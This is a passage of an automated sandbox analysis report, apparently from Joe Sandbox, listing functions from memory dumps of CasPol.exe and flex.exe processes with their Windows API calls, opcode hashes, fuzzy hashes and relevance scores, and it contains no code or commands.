Snapshot File: hcaresult_9_2_208c0000_CasPol.jbxd

Similarity

API ID: FindWindow
String ID: d
API String ID: 134000473-2564639436
Opcode ID: 369f0b180d79d85a4a5feca735427df1a57225781806a32d86087453bc1a9aac
Instruction ID: dc1fd00f0becc3b272e5910df5403281b172e8cd5c30176c2c0de46d006162b3
Opcode Fuzzy Hash: 369f0b180d79d85a4a5feca735427df1a57225781806a32d86087453bc1a9aac
Instruction Fuzzy Hash: 772140B1C013498FCB04EF9AD884BDEFBB4FF49224F11856ED509A7601D779A908CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 208C1180 Relevance: 1.6, APIs: 1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.44529021162.00000000208C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 208C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_208c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9077ae7402c882be33cf34ca6428e65f2060ed83934893ff09a4adc1423dfcdc
Instruction ID: 7edbfb7c7f18151831c164b4a15b671f035565c0473f11c57347691922c3f09d
Opcode Fuzzy Hash: 9077ae7402c882be33cf34ca6428e65f2060ed83934893ff09a4adc1423dfcdc
Instruction Fuzzy Hash: 75413572D043558FCB04CFA6D8406EEBBF5EF89220F05866AD508E7741DB78A844CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 1D7BDC18 Relevance: 1.6, APIs: 1, Instructions: 83fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 1D7BDCD0

Memory Dump Source

Source File: 00000009.00000002.44516256817.000000001D7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1d7b0000_CasPol.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 70c0fd1bf202fe439ac870ebcae18d5d7b386137178c79f1316a1525d1c1be01
Instruction ID: 22e834f8209f32c7b0e010fba412fce60fee29d4b2688e440c2b530a327efc53
Opcode Fuzzy Hash: 70c0fd1bf202fe439ac870ebcae18d5d7b386137178c79f1316a1525d1c1be01
Instruction Fuzzy Hash: 2D31BF70D083599FCB01CFAAC8447AEFBB0AF49320F05856BD509A7341D774A904CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 208CD52F Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 208CD606

Memory Dump Source

Source File: 00000009.00000002.44529021162.00000000208C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 208C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_208c0000_CasPol.jbxd

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: d7f84c522e66fb958143cb334b7ed1a4ad186277ebf7f55802432180d82a6640
Instruction ID: 6ca0448c986ce44b4cb80613c35e74feeee526a4a116729732db0dddcc5b4c8f
Opcode Fuzzy Hash: d7f84c522e66fb958143cb334b7ed1a4ad186277ebf7f55802432180d82a6640
Instruction Fuzzy Hash: 653196B2C013488BCB04CF99C841BDEFBF0EF59324F05851ED448A7A01E375AA48CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 208C6EFF Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,208C7546,?,?,?,?,?), ref: 208C7607

Memory Dump Source

Source File: 00000009.00000002.44529021162.00000000208C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 208C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_208c0000_CasPol.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 741ce235b2f95fcacc85c7db80471aa2ea6eff00afa0d4d64192420363be4050
Instruction ID: 52b7eb47f884bb06c06f0ab09f0735765e8da873d391db77447166866ef1d405
Opcode Fuzzy Hash: 741ce235b2f95fcacc85c7db80471aa2ea6eff00afa0d4d64192420363be4050
Instruction Fuzzy Hash: 3A3106B5805249DFCB10CF9AD884ADEFBF4FB48310F14851AE958A7211D374A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 208C7578 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,208C7546,?,?,?,?,?), ref: 208C7607

Memory Dump Source

Source File: 00000009.00000002.44529021162.00000000208C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 208C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_208c0000_CasPol.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 68ba25b6cd887758f0d094f6b04622a2cbbd032adba26e81a46de962ceb1dfae
Instruction ID: 8bab72cf0bc02f3a4e47f69ba929225fb9535666989100ffe46ce87199433411
Opcode Fuzzy Hash: 68ba25b6cd887758f0d094f6b04622a2cbbd032adba26e81a46de962ceb1dfae
Instruction Fuzzy Hash: C22144B58002899FCB00CFA9E984BDEFFF4EF48320F14851AE954A7251C338A950CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 208C6F14 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,208C7546,?,?,?,?,?), ref: 208C7607

Memory Dump Source

Source File: 00000009.00000002.44529021162.00000000208C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 208C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_208c0000_CasPol.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 529b4706b31d3312a521c9e0ea9510f402573c0b51201151a13d0ea3420bd11b
Instruction ID: 9f8574e27f7f4563fabf747013426e7997fe7e5af8a99ee28e838b3eb7b30fd5
Opcode Fuzzy Hash: 529b4706b31d3312a521c9e0ea9510f402573c0b51201151a13d0ea3420bd11b
Instruction Fuzzy Hash: 2F21E3B5900249DFDB10CFAAD884ADEFBF4EB48310F14842AE958A7311D378A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 1D7BC7BC Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 1D7BDCD0

Memory Dump Source

Source File: 00000009.00000002.44516256817.000000001D7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1d7b0000_CasPol.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: afaffff78daf15ac19431397a8d48933afb12426c476577f523c33396bc1ace2
Instruction ID: fae6a7cf5393ad7865a2b4a3f05354ce6ecf38ef02d939c8958daffd765f2ac2
Opcode Fuzzy Hash: afaffff78daf15ac19431397a8d48933afb12426c476577f523c33396bc1ace2
Instruction Fuzzy Hash: 3C2144B1C046599FCB10CF9AC4447AEFBB0FB48220F11852AD859A7240D778A954CFE2

Uniqueness

Uniqueness Score: -1.00%

Function 1D7BDC59 Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 1D7BDCD0

Memory Dump Source

Source File: 00000009.00000002.44516256817.000000001D7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1d7b0000_CasPol.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 2555af46bb7da203752e35e10c266b80c3a5e08994d3d2ec4ff546edc0ea65dc
Instruction ID: 2c6836d7732cea05709892301b1cff2cf0ca6ce04f634ed304ce8ac228577935
Opcode Fuzzy Hash: 2555af46bb7da203752e35e10c266b80c3a5e08994d3d2ec4ff546edc0ea65dc
Instruction Fuzzy Hash: 88216AB1C0061A9FCB00CF9AC440BAEFBB0FF48320F01852AD819A7240D378A954CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 208CB874 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 208CD606

Memory Dump Source

Source File: 00000009.00000002.44529021162.00000000208C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 208C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_208c0000_CasPol.jbxd

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: 182c4011a555fc986d0b9724b00f08a60fb3fc0ef966aabe07203861a1a53dc6
Instruction ID: 240e0acb988698179d0454df23aa00672299644d7c1ef3b33fa28d69c561fc6c
Opcode Fuzzy Hash: 182c4011a555fc986d0b9724b00f08a60fb3fc0ef966aabe07203861a1a53dc6
Instruction Fuzzy Hash: 7D211EB5C013498FCB14DF9AC884B9EFBB4FB89214F10852ED919B7600D779A908CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 208C1250 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 208C12BF

Memory Dump Source

Source File: 00000009.00000002.44529021162.00000000208C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 208C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_208c0000_CasPol.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 541069647d23a3e0ea2309f8f124dda73f5b8b84d6a777edc66f27446d3f0f05
Instruction ID: 6d8287251f11800e63a0cb56573b6c159a664044ad46ad9410baa8e1684fad50
Opcode Fuzzy Hash: 541069647d23a3e0ea2309f8f124dda73f5b8b84d6a777edc66f27446d3f0f05
Instruction Fuzzy Hash: E61106B1C002599BCB00CF9AC4447EEFBF4EF48220F15862AD514B7640D778A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 208CD589 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 208CD606

Memory Dump Source

Source File: 00000009.00000002.44529021162.00000000208C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 208C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_208c0000_CasPol.jbxd

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: 81f26a726decc68e44e594b6f24851b69dae57e388162375025bcd006e771117
Instruction ID: a0f360560cecc7df00e1cfb872e9b5b7944dc9cb8da645b66df41fd386b99f36
Opcode Fuzzy Hash: 81f26a726decc68e44e594b6f24851b69dae57e388162375025bcd006e771117
Instruction Fuzzy Hash: 7F212FB6C013598ECB04DF9AC584BDEFBB4FF49214F10892ED519B7600D374A548CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1D65D974 Relevance: 1.2, Instructions: 1216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.44515787026.000000001D65D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D65D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1d65d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c16e978857518319f7fbb7699ea522372d82abc0aee4b0077b1a4c9d26fa1b7b
Instruction ID: 37160309fc878ff0b03b6a509f45fe75eefb645a915d523227eb7f3a7199d3b4
Opcode Fuzzy Hash: c16e978857518319f7fbb7699ea522372d82abc0aee4b0077b1a4c9d26fa1b7b
Instruction Fuzzy Hash: 6842052581E3C68FC7138B389D642943F709F5B294B2D41EBC1C6CE4A3C61AA59BCB57

Uniqueness

Uniqueness Score: -1.00%

Function 1D64D3EC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.44515661968.000000001D64D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D64D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1d64d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbdf98745bb2fec65f622f188c406bada7d172942b84be2ae9b39b27a6b4ee05
Instruction ID: 0ba5542faec4a897c4c84883913a0b5795c720f9d87bf6fc250287d7741da0e5
Opcode Fuzzy Hash: dbdf98745bb2fec65f622f188c406bada7d172942b84be2ae9b39b27a6b4ee05
Instruction Fuzzy Hash: 52212571904240EFDB01DF18D9C0B26BF61FBA8724F34C569D9080B646C336E456CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 1D65E330 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.44515787026.000000001D65D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D65D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1d65d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32e85c81a474a924ecc6df78dddbb3430d09630b571048e492da3be55fb2c707
Instruction ID: 142eccb56a00807b66559e3fc5064968b9a5316bc374c3ea25bf543aa8a89d02
Opcode Fuzzy Hash: 32e85c81a474a924ecc6df78dddbb3430d09630b571048e492da3be55fb2c707
Instruction Fuzzy Hash: 152126B5608244DFDF01DF14DDC0B26BBA5FB88754F24C569D9494B283C37AD886CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1D65E309 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.44515787026.000000001D65D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D65D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1d65d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 742918c7274d236d0bd1b619d29eb2942818ebebb27577de38d0d99f29e50f56
Instruction ID: 82cd2b8e4e620d5cd31a40459a22c5f441b26a2d1240d90b780b6e5ac1d92ba6
Opcode Fuzzy Hash: 742918c7274d236d0bd1b619d29eb2942818ebebb27577de38d0d99f29e50f56
Instruction Fuzzy Hash: AE217C755093C49FCB028B24D994B15BF71EF46214F28C5EAD8488F2A7C37A985ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 1D64D3E7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.44515661968.000000001D64D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D64D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1d64d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85ef49338c9dff0502a018b220e7ec0b62d8228e1292eb106a2f8aac9c680f48
Instruction ID: 7562a34a5cb158586d4eb37da63d9d516082fe1931a10fd1cf4c72e818e6a3d4
Opcode Fuzzy Hash: 85ef49338c9dff0502a018b220e7ec0b62d8228e1292eb106a2f8aac9c680f48
Instruction Fuzzy Hash: FC117F76904280DFCB01CF14D5C4B16BF62FB98324F24C5A9D9094B656C33AE45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1D7B9648 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.44516256817.000000001D7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1d7b0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 061b36856aa98f8f51e6ab4361951065f6df34247a67e2ddc6d385ae8cccca67
Instruction ID: 196c9b58792b777bde0a271aa5afc6c3bddf5a5d1cf4da14ca223dd699204bbe
Opcode Fuzzy Hash: 061b36856aa98f8f51e6ab4361951065f6df34247a67e2ddc6d385ae8cccca67
Instruction Fuzzy Hash: 6AB14F70E046198FDB44CFA9C8857EDBBF2BF88724F14C529D825E7294EB749845CB82

Uniqueness

Uniqueness Score: -1.00%

Function 1D7B9300 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.44516256817.000000001D7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1d7b0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f70c231597c91acaae9fd9527e21a0950ce05b6bca889ace8bbb1b9560ed78c1
Instruction ID: 01a14cd27dc48808e12ec279b5a3c92e8fabff330fcae2617042a24f8348df33
Opcode Fuzzy Hash: f70c231597c91acaae9fd9527e21a0950ce05b6bca889ace8bbb1b9560ed78c1
Instruction Fuzzy Hash: 91916170E042099FDF04CFA5D9857EEBBF2BF88724F148529E825A7394DB349845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0131233B Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.44497900987.0000000001300000.00000040.00000400.00020000.00000000.sdmp, Offset: 01300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1300000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b990608c79c490852dd7f33b069281f4d1e2dc14129ee4baad01ee9d57dc1cb3
Instruction ID: bd2a492647ddfe2ece3f4c48b5eae63bf1d529097b0a0135955b9d32c454baae
Opcode Fuzzy Hash: b990608c79c490852dd7f33b069281f4d1e2dc14129ee4baad01ee9d57dc1cb3
Instruction Fuzzy Hash: 54417B602183068FDB6C9A3841B17B363975F51298B24856FCC478B6DEEF1584899A17

Uniqueness

Uniqueness Score: -1.00%

Function 01312366 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.44497900987.0000000001300000.00000040.00000400.00020000.00000000.sdmp, Offset: 01300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1300000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 874eb3d5cc4390d05d532be106ca18b8b5fa844ece9c22c44d072ce28957a12c
Instruction ID: 135bc64ce752238aac1dbb3b104f066a916788998fe8b82a5cae64975556fef7
Opcode Fuzzy Hash: 874eb3d5cc4390d05d532be106ca18b8b5fa844ece9c22c44d072ce28957a12c
Instruction Fuzzy Hash: BC3139301083068FDB6D8A2881F17B323979F51299F25C16FCC478B5EEEF258448DA17

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: flex.exePID: 7436, Parent PID: 5008COMMON

Executed Functions

Function 026E0D60 Relevance: 6.6, Strings: 4, Instructions: 1637COMMON

Download Yara Rule

Strings

LRk, xrefs: 026E12C3
LRk, xrefs: 026E0E6B
P, xrefs: 026E0D92
LRk, xrefs: 026E0DD2

Memory Dump Source

Source File: 0000000E.00000002.40102493248.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26e0000_flex.jbxd

Similarity

API ID:
String ID: LRk$LRk$LRk$P
API String ID: 0-154875629
Opcode ID: ba1387b5b09808abfe83d28279d90dae37fde60ba38c9c6faa3b17bcc8941a48
Instruction ID: 8cbb5276f8f114d363406385c7af5b613c6d035210d2da8da6357ea46a0b0fa7
Opcode Fuzzy Hash: ba1387b5b09808abfe83d28279d90dae37fde60ba38c9c6faa3b17bcc8941a48
Instruction Fuzzy Hash: 2232E3316052148FCB05EF74D858A6DBBB2FF85304F16C4A9E40A9B7A2DB74EC46CB81

Uniqueness

Uniqueness Score: -1.00%

Function 026E0D4F Relevance: 3.9, Strings: 3, Instructions: 134COMMON

Download Yara Rule

Strings

LRk, xrefs: 026E0E6B
P, xrefs: 026E0D92
LRk, xrefs: 026E0DD2

Memory Dump Source

Source File: 0000000E.00000002.40102493248.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26e0000_flex.jbxd

Similarity

API ID:
String ID: LRk$LRk$P
API String ID: 0-4257887857
Opcode ID: 4bb37a6c9be83f64f63f32e9b10a1e15cf7d6fb07fd4e97e7b87e8fa1e2fab83
Instruction ID: ef61e5e3b3d2e0fb4f78f900c96f2a0d6793ce7c15331b6bc8a6bed9e30f650a
Opcode Fuzzy Hash: 4bb37a6c9be83f64f63f32e9b10a1e15cf7d6fb07fd4e97e7b87e8fa1e2fab83
Instruction Fuzzy Hash: 4141AE31F112189FDB14DB78C450BAEB7B2EF89704F24866DE416AB391DB71AC46CB80

Uniqueness

Uniqueness Score: -1.00%

Function 026E06E4 Relevance: 1.5, Strings: 1, Instructions: 241COMMON

Download Yara Rule

Strings

8k, xrefs: 026E0874

Memory Dump Source

Source File: 0000000E.00000002.40102493248.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26e0000_flex.jbxd

Similarity

API ID:
String ID: 8k
API String ID: 0-238857276
Opcode ID: 8b683f7442d510a37586920acb17fed23c1efdde4495dc9a7770eb5dae72fb3b
Instruction ID: f543647b9bb01abfba8adccf321f3b8eac856fd44955c0b514cbfdf805c3b2be
Opcode Fuzzy Hash: 8b683f7442d510a37586920acb17fed23c1efdde4495dc9a7770eb5dae72fb3b
Instruction Fuzzy Hash: DF319E78A082449FE705EB76D805749BFF2AFC9204F18C4AAC40887379EB382955EB11

Uniqueness

Uniqueness Score: -1.00%

Function 026E0B08 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

LRk, xrefs: 026E0B2D

Memory Dump Source

Source File: 0000000E.00000002.40102493248.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26e0000_flex.jbxd

Similarity

API ID:
String ID: LRk
API String ID: 0-1084127097
Opcode ID: 392dd46a412dedfb23721949a4256f6ba7b359b4a48c64381a5526c96cfc97b0
Instruction ID: 6b22034e8956435ac3a705be89c1f035c17a3c49e38bf272a3994ad71fb4d641
Opcode Fuzzy Hash: 392dd46a412dedfb23721949a4256f6ba7b359b4a48c64381a5526c96cfc97b0
Instruction Fuzzy Hash: D4417038B00214DFCB04EF74D498AADB7B2BF88704B108529E90697365EF74E85ADB44

Uniqueness

Uniqueness Score: -1.00%

Function 026E09F0 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

tPk, xrefs: 026E0A8F

Memory Dump Source

Source File: 0000000E.00000002.40102493248.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26e0000_flex.jbxd

Similarity

API ID:
String ID: tPk
API String ID: 0-3531055577
Opcode ID: ed460a9562214782a76c214b94a4c860d4ba1633071e603766a86de34a01afde
Instruction ID: 5d1d18e1beccef5052e9d408519910379396c708e7bae2df9673e59a6d032e62
Opcode Fuzzy Hash: ed460a9562214782a76c214b94a4c860d4ba1633071e603766a86de34a01afde
Instruction Fuzzy Hash: 4C2149343412148FCB49EB38C45896C37A2EF8A62531600B9E906CF776DB35DC86CB50

Uniqueness

Uniqueness Score: -1.00%

Function 026E0848 Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

8k, xrefs: 026E0874

Memory Dump Source

Source File: 0000000E.00000002.40102493248.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26e0000_flex.jbxd

Similarity

API ID:
String ID: 8k
API String ID: 0-238857276
Opcode ID: f7a6ca0b7c97b96d58fd7dd2d19f042aac9dfb9c701d67abcd83b28f4598fbc2
Instruction ID: 8a11b667f01869a9ed307264d2e91e744d17f5668331374c4b04b5e2984adca9
Opcode Fuzzy Hash: f7a6ca0b7c97b96d58fd7dd2d19f042aac9dfb9c701d67abcd83b28f4598fbc2
Instruction Fuzzy Hash: B9213C78A042089FE709EF76E841759FBF3AFC8204F14C46AD50C97369EB382565EB11

Uniqueness

Uniqueness Score: -1.00%

Function 026E1048 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.40102493248.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26e0000_flex.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11458d4a73d744639710f161d071e454e30d0538d92f70ac4c4eda2de90bb3e0
Instruction ID: 794fef66246ffa20440697843738bbc46504868800642592ff2ef3060736fdca
Opcode Fuzzy Hash: 11458d4a73d744639710f161d071e454e30d0538d92f70ac4c4eda2de90bb3e0
Instruction Fuzzy Hash: 4831C474A083889FCB05EB74D8519AE7FB2AF85200B1184BED549DB392DB388D05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 026E0EF8 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.40102493248.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26e0000_flex.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 272919ba872bf27a51447e5359c119238d9069ee57e912d12b0b0fe89f7a7c19
Instruction ID: a4303d997749fb337582e9af091d28f3c2fae93f076e1be08224af56a71b8e01
Opcode Fuzzy Hash: 272919ba872bf27a51447e5359c119238d9069ee57e912d12b0b0fe89f7a7c19
Instruction Fuzzy Hash: 702135306083419FCB169B75D80466ABBF4AFC5314F1484ABE849CB366DBB4CC4ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 026E0C73 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.40102493248.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26e0000_flex.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcefacd2563439ee85c68e8a280f241d80997682e609db256506fc476bc804e8
Instruction ID: d17844ab5bf31251088487ec2a08c8e3deaad121fa67c1dc00354ede0c7836a2
Opcode Fuzzy Hash: dcefacd2563439ee85c68e8a280f241d80997682e609db256506fc476bc804e8
Instruction Fuzzy Hash: 5011AC74E41208DFDF08EFA4E558AAD7BB2AF48705F108429E816973A1DF74AC49DF44

Uniqueness

Uniqueness Score: -1.00%

Function 026E096A Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.40102493248.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26e0000_flex.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 874def7c17922b4813ccae020e859b60b66b8922d705c2587db81b5f351a2c5a
Instruction ID: 2b69ab47a2d119d4a654932aecd09aff231d91af54e92ff29f77f71d917a5cd9
Opcode Fuzzy Hash: 874def7c17922b4813ccae020e859b60b66b8922d705c2587db81b5f351a2c5a
Instruction Fuzzy Hash: FE017C35919204CFCB04EF74D80956D7BF0BF04211B2186AAE41AD32A1D7748805CF40

Uniqueness

Uniqueness Score: -1.00%

Function 026E0978 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.40102493248.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26e0000_flex.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e75be7a10aa04d51bc6b830dc65d8f07c39221357055c6707a16e739c2e6a0b
Instruction ID: 3ca9fa95ca1ffba0596baf549dd8343ab2d9aff5108ab4da5fa52667d1acffbe
Opcode Fuzzy Hash: 3e75be7a10aa04d51bc6b830dc65d8f07c39221357055c6707a16e739c2e6a0b
Instruction Fuzzy Hash: AC016935A14205CFCB48EFB8E80866EBBB5FF08311B21856AE41BD33A0DB749905CF80

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: flex.exePID: 5196, Parent PID: 5008COMMON

Executed Functions

Function 02610D60 Relevance: 6.6, Strings: 4, Instructions: 1637COMMON

Download Yara Rule

Strings

LRk, xrefs: 026112C3
LRk, xrefs: 02610E6B
P, xrefs: 02610D92
LRk, xrefs: 02610DD2

Memory Dump Source

Source File: 00000010.00000002.40181927888.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2610000_flex.jbxd

Similarity

API ID:
String ID: LRk$LRk$LRk$P
API String ID: 0-154875629
Opcode ID: e44680e37142b9b38f6ed8896b1fd0a112ea407f5fa79c295afde45637b6bb82
Instruction ID: 20e4972271e7e9f404b5687c60ad57c0e207353a6b6027966d5e74181fc55cd7
Opcode Fuzzy Hash: e44680e37142b9b38f6ed8896b1fd0a112ea407f5fa79c295afde45637b6bb82
Instruction Fuzzy Hash: 9432B631A002548FCB05DB74D494A6DBBB2FF89304F1AC5A9D9198F7A2DB34EC46CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02610D4F Relevance: 3.9, Strings: 3, Instructions: 134COMMON

Download Yara Rule

Strings

LRk, xrefs: 02610E6B
